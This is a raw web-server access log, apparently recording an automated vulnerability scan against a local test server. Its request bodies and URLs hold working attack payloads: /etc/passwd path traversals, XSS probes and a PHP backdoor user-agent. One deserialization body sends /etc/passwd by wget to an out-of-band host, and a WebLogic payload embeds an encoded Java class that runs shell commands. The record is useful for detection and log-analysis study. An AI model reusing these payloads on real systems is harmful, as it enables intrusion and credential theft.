"http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shop/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database/schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"ip=c9v8gc8smpv8b0ng0t00d66yk8tcrqufu.oast.online:80&argu=/","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/query.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /os/mxperson HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/index.php?db=information_schema HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A wget\x0D\x0A --post-file\x0D\x0A /etc/passwd\x0D\x0A c9v8gc8smpv8b0ng0t00x946z9tb6k3wz.oast.online\x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A java.lang.ProcessBuilder\x0D\x0A start\x0D\x0A \x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /orders/3 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_adminer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/administrator/images/background.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/install HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tips/tipsLogin.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /v1/kv/297MFgA4KG7yjPewOC46mPFQ9gm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib///....//....//....//....//....//....//....//....//etc//passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx_status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MFgGASlE4nRMmRldJxfsWo7c.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CMSPages/logon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"xxxxorg.slf4j.ext.EventData<java><void class=\x22sun.misc.BASE64Decoder\x22><void method=\x22decodeBuffer\x22 id=\x22byte_arr\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\x22org.mozilla.classfile.DefiningClassLoader\x22><void method=\x22defineClass\x22><string>ResultBaseExec</string><object idref=\x22byte_arr\x22></object><void method=\x22newInstance\x22><void method=\x22do_exec\x22 id=\x22result\x22><string>echo${IFS}COP-9272-9102-EVC|rev</string></void></void></void></void><void class=\x22java.lang.Thread\x22 method=\x22currentThread\x22><void method=\x22getCurrentWork\x22 id=\x22current_work\x22><void method=\x22getClass\x22><void method=\x22getDeclaredField\x22><string>connectionHandler</string><void method=\x22setAccessible\x22><boolean>true</boolean></void><void method=\x22get\x22><object idref=\x22current_work\x22></object><void method=\x22getServletRequest\x22><void method=\x22getResponse\x22><void method=\x22getServletOutputStream\x22><void method=\x22writeStream\x22><object class=\x22weblogic.xml.util.StringInputStream\x22><object idref=\x22result\x22></object></object></void><void method=\x22flush\x22/></void><void method=\x22getWriter\x22><void method=\x22write\x22><string></string></void></void></void></void></void></void></void></void></void></java>","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wls-wsat/CoordinatorPortType HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/warn.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /meaweb/os/mxperson HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webapp/?fccc%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data/autosuggest-remote.php?q=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/ui/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminer/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/images/componentutilslogin.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /concrete5/index.php/install HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"zerodiumvar_dump(233*233);", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/metadata HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/kv/297MFgA4KG7yjPewOC46mPFQ9gm?raw HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"\x0D\x0A\x0D\x0Apingback.ping\x0D\x0A\x0D\x0A\x0D\x0Ahttp://c9v8gc8smpv8b0ng0t003kzbocpn6qnd7.oast.online\x0D\x0A\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc/pingback HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /karma.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A